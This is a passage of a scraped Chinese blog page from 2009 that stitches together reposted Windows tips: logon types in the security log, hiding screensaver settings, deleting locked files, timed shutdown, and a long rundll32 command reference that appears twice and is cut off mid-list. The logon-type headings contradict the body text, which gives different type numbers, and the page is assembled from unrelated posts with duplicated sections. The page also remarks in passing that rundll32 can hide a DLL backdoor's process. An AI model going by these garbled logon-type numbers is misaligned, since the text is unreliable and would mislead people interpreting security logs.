与计划任务类似，每种服务都被配置在某个特定的用户账户下运行，当一个服务开始时，Windows首先为这个特定的用户创建一个登录会话，这将被记为类型5，失败的类型5通常表明用户的密码已变而这里没得到更新，当然这也可能是由恶意用户的密码猜测引起的，但是这种可能性比较小，因为创建一个新的服务或编辑一个已存在的服务默认情况下都要求是管理员或serversoperators身份，而这种身份的恶意用户，已经有足够的能力来干他的坏事了，已经用不着费力来猜测服务密码了。 登录类型5:解锁(Unlock) 你可能希望当一个用户离开他的计算机时相应的工作站自动开始一个密码保护的屏保，当一个用户回来解锁时，Windows就把这种解锁操作认为是一个类型7的登录，失败的类型7登录表明有人输入了错误的密码或者有人在尝试解锁计算机。 登录类型6:网络明文(NetworkCleartext) 这种登录表明这是一个像类型3一样的网络登录，但是这种登录的密码在网络上是通过明文传输的，WindowsServer服务是不允许通过明文验证连接到共享文件夹或打印机的，据我所知只有当从一个使用Advapi的ASP脚本登录或者一个用户使用基本验证方式登录IIS才会是这种登录类型。“登录过程”栏都将列出Advapi。 登录类型7:新凭证(NewCredentials) 当你使用带/Netonly参数的RUNAS命令运行一个程序时，RUNAS以本地当前登录用户运行它，但如果这个程序需要连接到网络上的其它计算机时，这时就将以RUNAS命令中指定的用户进行连接，同时Windows将把这种登录记为类型9，如果RUNAS命令没带/Netonly参数，那么这个程序就将以指定的用户运行，但日志中的登录类型是2。 登录类型8:远程交互(RemoteInteractive) 当你通过终端服务、远程桌面或远程协助访问计算机时，Windows将记为类型10，以便与真正的控制台登录相区别，注意XP之前的版本不支持这种登录类型，比如Windows2000仍然会把终端服务登录记为类型2。 登录类型9:缓存交互(CachedInteractive) Windows支持一种称为缓存登录的功能，这种功能对移动用户尤其有利，比如你在自己网络之外以域用户登录而无法登录域控制器时就将使用这种功能，默认情况下，Windows缓存了最近10次交互式域登录的凭证HASH，如果以后当你以一个域用户登录而又没有域控制器可用时，Windows将使用这些HASH来验证你的身份。 上面讲了Windows的登录类型，但默认情况下Windows2000是没有记录安全日志的，你必须先启用组策略“计算机配置/Windows设置/安全设置/本地策略/审核策略”下的“审核登录事件”才能看到上面的记录信息。希望这些详细的记录信息有助于大家更好地掌握系统情况，维护网络安定。 卸载屏保的方法 2009-02-08 13:05:38 被19人转藏 | 小贴士:测测你是不是娱乐八卦狂人? 卸载屏保的方法 A、Windows 98 (Me)中的设置方法 ,( 打开“运行”对话框，输入Regedit命令，打开注册表编辑器。 ,( 进入HKEY_CURRENT_USER\ Software\Microsoft\Windows\Current Version\Polices\System主键下。如果System主键不存在，手动创建它。 ,( 新建DOWRD键值NoDispScrsavPage。值为1表示隐藏“显示属性”的“屏幕保护程序”选项，值为,表示正常显示屏幕保护程序。 B、Windows XP(2000)中的设置方法 1(打开“运行”对话框，输入Gpedit.msc命令，打开“组策略”编辑窗口。 2( 在“组策略”编辑窗口中依次打开“本地计算机策略?用户配置?管理模板?控制面板?显示分支”，然后在窗口右侧双击“隐藏屏幕保护程序”选项卡，打开“隐藏屏幕保护程序”选项卡属性，在属性对话框中，选中“已启用”，单击确定按钮。 小贴士:QQ秘籍训练营,用QQ懂QQ 俗话说得好，请神容易送神难，出于某种需要安装了一些软件，当不再需要使用它们时，诸如非法删除、软件非法关闭、软件自身的BUG等方面的原因，常常会出现该软件不能卸载或卸载不完全等现象，有时候我们在删除某个文件或文件夹时，系统提示无法删除，这的确令人十分头疼，现在我们就来看看解决的办法。 一、常规解决办法 1(注消或重启电脑，然后再试着删除。 2(在启动时按F8键选择进入“安全模式”删除。 3(在纯DOS命令行下使用DEL、DELTREE和RD命令将其删除。 4(如果是文件夹中有比较多的子目录或文件而导致无法删除，可先删除该文件夹中的子目录和文件，再删除文件夹。 5(如果是在“添加或删除程序”选项卸载一个软件后，发现软件的安装目录仍旧存在，里边残留着几个文件，直接删除时，系统却提示文件正在使用无法删除。 此时可首先打开“命令提示符”窗口，按“Ctrl+Alt+Del”组合键打开任务管理器，在进程中将“explorer.exe”进程关闭掉(在这之前最好将所有程序关闭掉)，切换到命令提示符窗口，使用DOS命令进入无法删除的文件夹，输入“Del 文件夹名”就可以将该文件夹删除了。删除完成后，在任务管理器中选择“文件?新任务”，输入“explorer.exe”重新建立系统的外壳。 6.利用非Windows资源管理器的第三方工具删除，例如具有浏览文件夹功能的Total Commander、ACDSee、FlashFXP、Nero等软件。 7.如果你安装了两个以上的操作系统，那么就可以在当前系统中删除其它操作系统的文件。 二、高级解决方案 1(磁盘错误 运行磁盘扫描，并扫描文件所在分区，扫描前确定已选上修复文件和坏扇区，全面扫描所有选项，扫描后再删除文件。 2(预读机制 某些视频、图像文件播放中断或正在预览时会造成无法删除。在“运行”框中输入:REGSVR32 /U SHMEDIA.DLL，注销掉预读功能。或在注册表中删除[HKEY_ LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{87D62D94-71B3-4b9a-9489-5FE6850DC73E}\InProcServer32] 键值。然后即可删除文件。 3(防火墙 由于反病毒软件在查毒时也会导致执行删除时提示文件正在使用，这时可试着停止或关闭它再删。 4(Office、WPS系列软件 Office、WPS的非法关闭也会造成文件无法删除或改名。重新运行该程序，然后正常关闭，再删除文件。 5(借助WinRAR 右击要删除的文件夹，选择“添加到压缩文件”。在弹出的对话框中选中“压缩后删除源文件，”随便写个压缩包名，点击“确定”按钮即可。 6(权限问题 如果是Windows 2000/XP/2003系统，请先确定是否有权限删除这个文件或文件夹。 7(可执行文件的删除 当执行文件的映像或程序所调用的DLL动态链接库还在内存中未释放，删除时也会提示文件正在使用，解决方法是在DOS下删除系统的页面文件(Win98中是Win386.SWP，Win2000/XP是pagefile.sys)。 8(文件粉碎法 使用文件粉碎机，如Windows优化大师或File Pulverizer，可以彻底删除一些顽固文件。 9(借助小软件??WhoLockMe 安装WhoLockMe。安装后，可以在右键菜单中找到“谁锁住了我,”的选项，通过点击它，就可以看到谁在调用文件了，按下“结束进程”就可以将调用文件的程序关掉，然后你就可以轻松的删除任何不再需要的文件了。 10(清除软件卸载后的残留项 从控制面板的“添加或删除程序”卸载软件，软件卸载了，但在“添加/删除程序”中依旧有它的存在，虽不影响系统的运行，但总觉得挺别扭，如何彻底清除它呢, 方法一:记住软件名，到Windows\System文件夹下找到其对应的CPL文件(因为每个删除项都对应这一个CPL文件，CPL文件删除了删除项也就没有了)，删除后控制面板中的相应项目就会消失了。 方法二:启动注册表编辑器。定位到 [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersin\Uninstall]，选中要删除的应用程序名右击删除即可。 11(清除WinXP自带程序 对于系统捆绑的程序，当在“删除或添加程序”中找不到相应的卸载选项时，可用记事本打开C:\WINDOWS\inf下的“Sysoc.inf”文件，使用替换功能，将“hide”替换为“,”(不含引号)，保存后重启电脑，“添加/删除程序”中就有了Media Player等系统自带程序的删除项了。 12.删除“其它程序正在使用”的文件 PS: 举例问题: Windows XP系统中，准备删除一个大容量的AVI格式文件，但系统却总是提示无法执行删除操作，有别的程序在使用，即使刚开机进入Windows系统时也是如此。 问题解决: 方法1:打开记事本，点击菜单栏“文件”?“另存为”，命名文件和你想删除的那个文件名一致(包括扩展名)，而后进行替换，会发现容量变为0 KB了。此时，执行删除命令即可。 方法2:在那个AVI文件同目录中新建一个文件夹，然后重新启动。现在，不要选那个AVI文件，先选择适才新建的文件夹，然后再同时按Ctrl键+那个AVI文件，执行删除操作。 方法3:把AVI文件的扩展名改为其它任意无效的文件类型，再执行删除操作。 方法4:有一个一劳永逸的方法就是禁用Windows XP的媒体预览功能，点击“开始”?“运行”，输入:“CMD”后回车。然后在“命令提示符”窗口下输入:regsvr32 /u shmedia.dll 回车确认操作后将卸载视频文件的预览功能。以后在需要恢复视频文件预览功能时，在“命令提示符”中输入:regsvr32 shmedia.dll命令即可。 方法5:启动曾播放过那个AVI文件的媒体播放器，打开另一个文件。此后，再尝试删除即可。 方法6:可用WinRAR程序删除，用鼠标右键单击那个AVI文件，在弹出菜单中选择“添加到压缩文件”，而后在弹出窗口的“常规”标签页中选择“压缩后删除源文件”复选框。确认操作后，执行压缩操作。最后再删除该压缩文件。 方法7:调出“Windows任务管理器”，在其中选择结束Explorer进程，但此时不要关闭该窗口。这时候，会出现像死机一样的状况。我们切换到“应用程序”标签页，点击“新任务”按钮，输入Explorer.exe 并确认操作。此后，桌面又恢复正常了，再执行删除操作即可。 13.以使用8.3格式缩小长度或更改路径中部分目录名以减少路径的长度。例如可以暂时把路径中某些目录改名字，或在命令行模式下使用8.3格式。例如，“Linux Faq”的目录变成8.3就是“LINUXF~1”了，通过“Linuxf~1”就能进入目录了，此后就可以使用Del命令删除指定文件了。如果需要删除目录，则使用Rd命令。 14.非法字符导致文件或文件夹无法删除 如果是由于非法字符导致文件或文件夹无法删除，可以在“命令提示符”界面中进入要删除文件的目录，输入“dir>del.bat”，利用DOS的管道命令把当前目录的文件列表自动输入到批处理命令文件“del.bat”中，然后修改该批命令文件，仅保留文件或目录名，并在文件或者目录名称前增加“del ”或者“rd”，然后运行批处理命令即可删除。 15.无法删除系统中的任何文件 查看系统中是否安装了具有反删除功能的防护软件，如果是则将其删除即可。 Windows XP自动关机的实现 2009-02-08 13:04:27 被31人转藏 | 小贴士:哇!别人的口袋访问量好高啊，怎么办到的? Windows XP自动关机的实现 Windows XP的关机是由Windows\System32下的Shutdown.exe程序来控制的。(如果想把Shutdown.exe复制到Windows 2000系统目录下，也可以实现。) 比如你的电脑要在22:00关机，可以选择“开始?运行”，输入“at 22:00 Shutdown -s”，这样，到了22点电脑就会出现“系统关机”对话框，默认有30秒钟的倒计时并提示你保存工作。如果你想以倒计时的方式关机，可以输入“Shutdown.exe -s -t 3600”，这里表示60分钟后自动关机，“3600”代表60分钟。 设置好自动关机后，如果想取消的话，可以在运行中输入“shutdown -a”。另外输入“shutdown -i”，则可以打开设置自动关机对话框，对自动关机进行设置。 Shutdown.exe的参数，每个都具有特定的用途，执行每一个都会产生不同的效果，比如“-s”就表示关闭本地计算机，“-a”表示取消关机操作，下面列出了更多参数，大家可以在Shutdown.exe中按需使用。 -f:强行关闭应用程序 -m \\计算机名:控制远程计算机 -i:显示图形用户界面，但必须是Shutdown的第一个选项 -l:注销当前用户 -r:关机并重启 -t 时间:设置关机倒计时 -c "消息内容":输入关机对话框中的消息内容(不能超127个字符) Rundll32.exe命令使用大法 2009-02-08 13:02:20 被18人转藏 | 小贴士:测试:你在别人眼中的真相，很真实～ [转]Rundll32.exe命令使用大法 Rundll32.exe是什么,顾名思意，“执行32位的DLL文件”。它的作用是执行DLL文件中的内部函数，这样在进程当中，只会有Rundll32.exe，而不会有DLL后门的进程，这样，就实现了进程上的隐藏。如果看到系统中有多个Rundll32.exe，不必惊慌，这证明用Rundll32.exe启动了多少个的DLL文件。当然，这些Rundll32.exe执行的DLL文件是什么，我们都可以从系统自动加载的地方找到。 现在，我来介绍一下Rundll32.exe这个文件，意思上边已经说过，功能就是以命令行的方式调用动态链接程序库。系统中还有一个Rundll.exe文件，他的意思是“执行16位的DLL文件”，这里要注意一下。再来看看Rundll32.exe使用的函数原型: Void CALLBACK FunctionName ( HWND hwnd, HINSTANCE hinst, LPTSTR lpCmdLine, Int nCmdShow ); 其命令行下的使用方法为:Rundll32.exe DLLname,Functionname [Arguments] DLLname为需要执行的DLL文件名;Functionname为前边需要执行的DLL文件的具体引出函数;[Arguments]为引出函数的具体参数。 略谈Rundll32.exe的作用 常用Windows9x的朋友一定对Rundll32.exe和Rundll.exe这两个档案不会陌生吧，不过,由於这两个程式的功能原先只限於在微软内部使用，因而真正知道如何使用它们的朋友想必不多。那么好，如果你还不清 楚的话，那么就让我来告诉你吧。 首先，请你做个小实验(请事先保存好你正在执行的程式的结果，否则...):点击“开始,程式,Ms,Dos方式”，进入Dos视窗，然後键入rundll32.exe user.exe,restartwindows，再按下回车键，这时你将看到，机器被重启了～怎么样，是不是很有趣, 当然，Rundll的功能绝不仅仅是重启你的机器。其实，Rundll者，顾名思义，执行Dll也，它的功能就是以命令列的方式呼叫Windows的动态链结库，Rundll32.exe与Rundll.exe的区别就在於前者是呼叫32位的链结库，而後者是运用於16位的链结库， 它们的命令格式是: RUNDLL.EXE ，， 这里要注意三点: 1.Dll档案名中不能含有空格，比如该档案位於c:\ProgramFiles\目录，你要把这个路径改成c:\Progra,1\; 2.Dll档案名与Dll入口点间的逗号不能少，否则程式将出错并且不会给出任何资讯～ 3.这是最重要的一点:Rundll不能用来呼叫含返回值参数的Dll，例如Win32API中的 GetUserName(),GetTextFace()等。在Visual Basic中，提供了一条执行外部程式的指令Shell,格式为: Shell “命令列” 如果能配合Rundll32.exe用好Shell指令，会使您的VB程式拥有用其他方法难以甚至无法实现的效果:仍以重启为例，传统的方法需要你在VB工程中先建立一个模组，然後写入WinAPI的声明，最後才能在程式中呼叫。 而现在只需一句: Shell “rundll32.exe user.exe,restartwindows”就搞定了～是不是方便多了, 实际上，Rundll32.exe在呼叫各种Windows控制面板和系统选项方面有著独特的优势。下面，我就将本人在因特网上收集的有关Rundll的指令列举如下(很有用的，能省去你很多呼叫Windows API的时间～～)，供大家在程式设计中引用: 命令列: rundll32.exe shell32.dll,Control_RunDLL 功能: 显示控制面板 命令列: rundll32.exe shell32.dll,Control_RunDLL access.cpl,,1 功能: 显示“控制面板,辅助选项,键盘”选项视窗 命令列: rundll32.exe shell32.dll,Control_RunDLL access.cpl,,2 功能: 显示“控制面板,辅助选项,声音”选项视窗 命令列: rundll32.exe shell32.dll,Control_RunDLL access.cpl,,3 功能: 显示“控制面板,辅助选项,显示”选项视窗 命令列: rundll32.exe shell32.dll,Control_RunDLL access.cpl,,4 功能: 显示“控制面板,辅助选项,滑鼠”选项视窗 命令列: rundll32.exe shell32.dll,Control_RunDLL access.cpl,,5 功能: 显示“控制面板,辅助选项,传统”选项视窗 命令列: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl @1 功能: 执行“控制面板,添加新硬体”向导。 命令列: rundll32.exe shell32.dll,SHHelpShortcuts_RunDLL AddPrinter 功能: 执行“控制面板,添加新印表机”向导。 命令列: rundll32.exe shell32.dll,Control_RunDLL appwiz.cpl,,1 功能: 显示 “控制面板,添加/删除程式,安装/卸载” 面板。 命令列: rundll32.exe shell32.dll,Control_RunDLL appwiz.cpl,,2 功能: 显示 “控制面板,添加/删除程式,安装Windows” 面板。 命令列: rundll32.exe shell32.dll,Control_RunDLL appwiz.cpl,,3 功能: 显示 “控制面板,添加/删除程式,启动盘” 面板。 命令列: rundll32.exe syncui.dll,Briefcase_Create 功能: 在桌面上建立一个新的“我的公文包”。 命令列: rundll32.exe diskcopy.dll,DiskCopyRunDll 功能: 显示复制软碟视窗 命令列: rundll32.exe apwiz.cpl,NewLinkHere ,1 功能: 显示“建立快捷方式”的对话框，所建立的快捷方式的位置由,1参数决定。 命令列: rundll32.exe shell32.dll,Control_RunDLL timedate.cpl,,0 功能: 显示“日期与时间”选项视窗。 命令列: rundll32.exe shell32.dll,Control_RunDLL timedate.cpl,,1 功能: 显示“时区”选项视窗。 命令列: rundll32.exe rnaui.dll,RnaDial [某个拨号连接的名称] 功能: 显示某个拨号连接的拨号视窗。如果已经拨号连接，则显示目前的连接状态的视窗。 命令列: rundll32.exe rnaui.dll,RnaWizard 功能: 显示“新建拨号连接”向导的视窗。 命令列: rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,0 功能: 显示“显示属性,背景”选项视窗。 命令列: rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,1 功能: 显示“显示属性,萤屏保护”选项视窗。 命令列: rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,2 功能: 显示“显示属性,外观”选项视窗。 命令列: rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,3 功能: 显示显示“显示属性,属性”选项视窗。 命令列: rundll32.exe shell32.dll,SHHelpShortcuts_RunDLL FontsFolder 功能: 显示Windows的“字体”档案夹。 命令列: rundll32.exe shell32.dll,Control_RunDLL main.cpl @3 功能: 同样是显示Windows的“字体”档案夹。 命令列: rundll32.exe shell32.dll,SHformatDrive 功能: 显示格式化软碟对话框。 命令列: rundll32.exe shell32.dll,Control_RunDLL joy.cpl,,0 功能: 显示“控制面板控制器,一般”选项视窗。 命令列: rundll32.exe shell32.dll,Control_RunDLL joy.cpl,,1 功能: 显示“控制面板,游戏控制器,进阶”选项视窗。 命令列: rundll32.exe mshtml.dll,PrintHTML (HTML文档) 功能: 列印HTML文档。 命令列: rundll32.exe shell32.dll,Control_RunDLL mlcfg32.cpl 功能: 显示Microsoft Exchange一般选项视窗。 命令列: rundll32.exe shell32.dll,Control_RunDLL main.cpl @0 功能: 显示“控制面板,滑鼠” 选项 。 命令列: rundll32.exe shell32.dll,Control_RunDLL main.cpl @1 功能: 显示 “控制面板,键盘属性,速度”选项视窗。 命令列: rundll32.exe shell32.dll,Control_RunDLL main.cpl @1,,1 功能: 显示 “控制面板,键盘属性,语言”选项视窗。 命令列: rundll32.exe shell32.dll,Control_RunDLL main.cpl @2 功能: 显示Windows“印表机”档案夹。 命令列: rundll32.exe shell32.dll,Control_RunDLL main.cpl @3 功能: 显示Windows“字体”档案夹。 命令列: rundll32.exe shell32.dll,Control_RunDLL main.cpl @4 功能: 显示“控制面板,输入法属性,输入法”选项视窗。 命令列: rundll32.exe shell32.dll,Control_RunDLL modem.cpl,,add 功能: 执行“添加新调制解调器”向导。 命令列: rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,0 功能: 显示“控制面板,多媒体属性,音频”属性页。 命令列: rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,1 功能: 显示“控制面板,多媒体属性,视频”属性页。 命令列: rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,2 功能: 显示“控制面板,多媒体属性,MIDI”属性页。 命令列: rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,3 功能: 显示“控制面板,多媒体属性,CD音乐属性页。 命令列: rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,4 功能: 显示“控制面板,多媒体属性,设备”属性页。 命令列: rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl @1 功能: 显示“控制面板,声音”选项视窗。 命令列: rundll32.exe shell32.dll,Control_RunDLL netcpl.cpl 功能: 显示“控制面板,网路”选项视窗。 命令列: rundll32.exe shell32.dll,Control_RunDLL odbccp32.cpl 功能: 显示ODBC32资料管理选项视窗。 命令列: rundll32.exe shell32.dll,OpenAs_RunDLL {drive:\path\filename} 功能: 显示指定档案(drive:\path\filename)的“打开方式”对话框。 命令列: rundll32.exe shell32.dll,Control_RunDLL password.cpl 功能: 显示“控制面板,密码”选项视窗。 命令列: rundll32.exe shell32.dll,Control_RunDLL powercfg.cpl 功能: 显示“控制面板,电源管理属性”选项视窗。 命令列: rundll32.exe shell32.dll,SHHelpShortcuts_RunDLL PrintersFolder 功能: 显示Windows“印表机”档案夹。(同rundll32.exe shell32.dll,Control_RunDLL main.cpl @2) 命令列: rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,0 功能: 显示“控制面板,区域设置属性,区域设置”选项视窗。 命令列: rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,1 功能: 显示“控制面板,区域设置属性,数字”选项视窗。 命令列: rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,2 功能: 显示“控制面板,区域设置属性,货币”选项视窗。 命令列: rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,3 功能: 显示“控制面板,区域设置属性,时间”选项视窗。 命令列: rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,4 功能: 显示“控制面板,区域设置属性,日期”选项视窗。 命令列: rundll32.exe desk.cpl,InstallScreenSaver [萤屏保护档案名] 功能: 将指定的萤屏保护档案设置为Windows的屏保，并显示萤屏保护属性视窗。 命令列: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,0 功能: 显示“控制面板,系统属性,传统”属性视窗。 命令列: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,1 功能: 显示“控制面板,系统属性,设备管理器”属性视窗。 命令列: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,2 功能: 显示“控制面板,系统属性,硬体配置档案”属性视窗。 命令列: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,3 功能: 显示“控制面板,系统属性,性能”属性视窗。 命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。 命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机。 命令列: rundll32.exe shell32.dll,Control_RunDLL telephon.cpl 功能: 显示“拨号属性”选项视窗 命令列: rundll32.exe shell32.dll,Control_RunDLL themes.cpl 功能: 显示“桌面主旨”选项面板 Windows Vista Rundll32 常用命令列表 添加删除程序 RunDll32.exe shell32.dll，Control_RunDLL appwiz.cpl，，0 内容审查程序 RunDll32.exe msrating.dll，RatingSetupUI 控制面板 RunDll32.exe shell32.dll，Control_RunDLL 删除IE浏览器等上网产生的Internet 临时文件 RunDll32.exe InetCpl.cpl，ClearMyTracksByProcess 8 删除IE浏览器等上网产生的Cookies RunDll32.exe InetCpl.cpl，ClearMyTracksByProcess 2 删除IE浏览器等上网浏览历史 RunDll32.exe InetCpl.cpl，ClearMyTracksByProcess 1 删除IE浏览器等的填表记录 RunDll32.exe InetCpl.cpl，ClearMyTracksByProcess 16 删除IE浏览器等上网时保存的用户密码 RunDll32.exe InetCpl.cpl，ClearMyTracksByProcess 32 删除上面所有的上网产生的垃圾、记录、临时文件 RunDll32.exe InetCpl.cpl，ClearMyTracksByProcess 255 删除IE浏览器插件所产生的垃圾记录 RunDll32.exe InetCpl.cpl，ClearMyTracksByProcess 4351 调整日期和时间 RunDll32.exe shell32.dll，Control_RunDLL timedate.cpl 显示设置 RunDll32.exe shell32.dll，Control_RunDLL access.cpl，，3 设备管理器 RunDll32.exe devmgr.dll DeviceManager_Execute 文件夹选项 - 常规 RunDll32.exe shell32.dll，Options_RunDLL 0 文件夹选项 - 文件类型设置 RunDll32.exe shell32.dll，Control_Options 2 文件夹选项 - 搜索设置 RunDll32.exe shell32.dll，Options_RunDLL 2 文件夹选项 - 查看 RunDll32.exe shell32.dll，Options_RunDLL 7 忘记密码向导 RunDll32.exe keymgr.dll，PRShowSaveWizardExW 立即进入休眠状态 RunDll32.exe powrprof.dll，SetSuspendState Internet Explorer 的 Internet 选项 Rundll32 Shell32.dll，ConBring up trol_RunDLL Inetcpl.cpl，，6 键盘设置 RunDll32.exe shell32.dll，Control_RunDLL main.cpl @1 锁屏 RunDll32.exe user32.dll，LockWorkStation 鼠标切换左右键 Rundll32 User32.dll，SwapMouseButton 鼠标设置 Rundll32 Shell32.dll，Control_RunDLL main.cpl @0，0 映射网络驱动器 Rundll32 Shell32.dll，SHHelpShortcuts_RunDLL Connect 网络连接 RunDll32.exe shell32.dll，Control_RunDLL ncpa.cpl 管理IE收藏夹 Rundll32.exe shdocvw.dll，DoOrganizeFavDlg 直接打开某文件的对话框 Rundll32 Shell32.dll，OpenAs_RunDLL 任意文件名 打印机用户界面 Rundll32 Printui.dll，PrintUIEntry /? 打印机管理 Rundll32 Shell32.dll，SHHelpShortcuts_RunDLL PrintersFolder 电源设置 RunDll32.exe Shell32.dll，Control_RunDLL powercfg.cpl Process Idle Tasks rundll32.exe advapi32.dll，ProcessIdleTasks 地区和语言设置 Rundll32 Shell32.dll，Control_RunDLL Intl.cpl，，0 系统保存的密码管理 RunDll32.exe keymgr.dll，KRShowKeyMgr 安全移除硬件对话框 Rundll32 Shell32.dll，Control_RunDLL HotPlug.dll 系统声音设置 Rundll32 Shell32.dll，Control_RunDLL Mmsys.cpl，，0 系统属性对话框 Rundll32 Shell32.dll，Control_RunDLL Sysdm.cpl，，3 系统属性 - 高级 RunDll32.exe shell32.dll，Control_RunDLL sysdm.cpl，，4 系统属性:自动更新 RunDll32.exe shell32.dll，Control_RunDLL sysdm.cpl，，5 任务栏属性 RunDll32.exe shell32.dll，Options_RunDLL 1 用户帐户管理 RunDll32.exe shell32.dll，Control_RunDLL nusrmgr.cpl 插入/弹出硬件 RunDll32.exe shell32.dll，Control_RunDLL hotplug.dll Windows 安全中心 RunDll32.exe shell32.dll，Control_RunDLL wscui.cpl Windows - 关于 RunDll32.exe SHELL32.DLL，ShellAboutW Windows 字体安装文件夹 Rundll32 Shell32.dll，SHHelpShortcuts_RunDLL FontsFolder Windows防火墙 RunDll32.exe shell32.dll，Control_RunDLL firewall.cpl 无线网络设置 RunDll32.exe shell32.dll，Control_RunDLL NetSetup.cpl，@0，WNSW 当然，不止是VisualBasic，象Delphi.VisualC，，等其他程式设计语言也可以通过呼叫外部命令的方法来使用Rundll的这些功能，具方法这里就不再详细叙述了。灵活的使用Rundll,一定会使你的程式设计轻轻松松，达到事半功倍的效果～ Rundll32.exe是什么,顾名思意，“执行32位的DLL文件”。它的作用是执行DLL文件中的内部函数，这样在进程当中，只会有Rundll32.exe，而不会有DLL后门的进程，这样，就实现了进程上的隐藏。如果看到系统中有多个Rundll32.exe，不必惊慌，这证明用Rundll32.exe启动了多少个的DLL文件。当然，这些Rundll32.exe执行的DLL文件是什么，我们都可以从系统自动加载的地方找到。 现在，我来介绍一下Rundll32.exe这个文件，意思上边已经说过，功能就是以命令行的方式调用动态链接程序库。系统中还有一个Rundll.exe文件，他的意思是“执行16位的DLL文件”，这里要注意一下。再来看看Rundll32.exe使用的函数原型: Void CALLBACK FunctionName ( HWND hwnd, HINSTANCE hinst, LPTSTR lpCmdLine, Int nCmdShow ); 其命令行下的使用方法为:Rundll32.exe DLLname,Functionname [Arguments] DLLname为需要执行的DLL文件名;Functionname为前边需要执行的DLL文件的具体引出函数;[Arguments]为引出函数的具体参数。 略谈Rundll32.exe的作用 常用Windows9x的朋友一定对Rundll32.exe和Rundll.exe这两个档案不会陌生吧，不过,由於这两个程式的功能原先只限於在微软内部使用，因而真正知道如何使用它们的朋友想必不多。那么好，如果你还不清楚的话，那么就让我来告诉你吧。 首先，请你做个小实验(请事先保存好你正在执行的程式的结果，否则...):点击“开始,程式,Ms,Dos方式”，进入Dos视窗，然後键入rundll32.exe user.exe,restartwindows，再按下回车键，这时你将看到，机器被重启了～怎么样，是不是很有趣, 当然，Rundll的功能绝不仅仅是重启你的机器。其实，Rundll者，顾名思义，执行Dll也，它的功能就是以命令列的方式呼叫Windows的动态链结库，Rundll32.exe与Rundll.exe的区别就在於前者是呼叫32位的链结库，而後者是运用於16位的链结库， 它们的命令格式是: RUNDLL.EXE ，， 这里要注意三点: 1.Dll档案名中不能含有空格，比如该档案位於c:\ProgramFiles\目录，你要把这个路径改成c:\Progra,1\; 2.Dll档案名与Dll入口点间的逗号不能少，否则程式将出错并且不会给出任何资讯～ 3.这是最重要的一点:Rundll不能用来呼叫含返回值参数的Dll，例如Win32API中的GetUserName(),GetTextFace()等。在Visual Basic中，提供了一条执行外部程式的指令Shell,格式为: Shell “命令列” 如果能配合Rundll32.exe用好Shell指令，会使您的VB程式拥有用其他方法难以甚至无法实现的效果: 仍以重启为例，传统的方法需要你在VB工程中先建立一个模组，然後写入WinAPI的声明，最後才能在程 式中呼叫。 而现在只需一句: Shell “rundll32.exe user.exe,restartwindows”就搞定了～是不是方便多了, 实际上，Rundll32.exe在呼叫各种Windows控制面板和系统选项方面有著独特的优势。下面，我就将本人 在因特网上收集的有关Rundll的指令列举如下(很有用的，能省去你很多呼叫Windows API的时间～～)， 供大家在程式设计中引用: 命令列: rundll32.exe shell32.dll,Control_RunDLL 功能: 显示控制面板 命令列: rundll32.exe shell32.dll,Control_RunDLL access.cpl,,1 功能: 显示“控制面板,辅助选项,键盘”选项视窗 命令列: rundll32.exe shell32.dll,Control_RunDLL access.cpl,,2 功能: 显示“控制面板,辅助选项,声音”选项视窗 命令列: rundll32.exe shell32.dll,Control_RunDLL access.cpl,,3 功能: 显示“控制面板,辅助选项,显示”选项视窗 命令列: rundll32.exe shell32.dll,Control_RunDLL access.cpl,,4 功能: 显示“控制面板,辅助选项,滑鼠”选项视窗 命令列: rundll32.exe shell32.dll,Control_RunDLL access.cpl,,5 功能: 显示“控制面板,辅助选项,传统”选项视窗 命令列: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl @1 功能: 执行“控制面板,添加新硬体”向导。 命令列: rundll32.exe shell32.dll,SHHelpShortcuts_RunDLL AddPrinter 功能: 执行“控制面板,添加新印表机”向导。 命令列: rundll32.exe shell32.dll,Control_RunDLL appwiz.cpl,,1 功能: 显示 “控制面板,添加/删除程式,安装/卸载” 面板。 命令列: rundll32.exe shell32.dll,Control_RunDLL appwiz.cpl,,2 功能: 显示 “控制面板,添加/删除程式,安装Windows” 面板。 命令列: rundll32.exe shell32.dll,Control_RunDLL appwiz.cpl,,3 功能: 显示 “控制面板,添加/删除程式,启动盘” 面板。 命令列: rundll32.exe syncui.dll,Briefcase_Create 功能: 在桌面上建立一个新的“我的公文包”。 命令列: rundll32.exe diskcopy.dll,DiskCopyRunDll 功能: 显示复制软碟视窗 命令列: rundll32.exe apwiz.cpl,NewLinkHere ,1 功能: 显示“建立快捷方式”的对话框，所建立的快捷方式的位置由,1参数决定。 命令列: rundll32.exe shell32.dll,Control_RunDLL timedate.cpl,,0 功能: 显示“日期与时间”选项视窗。 命令列: rundll32.exe shell32.dll,Control_RunDLL timedate.cpl,,1 功能: 显示“时区”选项视窗。 命令列: rundll32.exe rnaui.dll,RnaDial [某个拨号连接的名称] 功能: 显示某个拨号连接的拨号视窗。如果已经拨号连接，则显示目前的连接状态的视窗。 命令列: rundll32.exe rnaui.dll,RnaWizard 功能: 显示“新建拨号连接”向导的视窗。 命令列: rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,0 功能: 显示“显示属性,背景”选项视窗。 命令列: rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,1 功能: 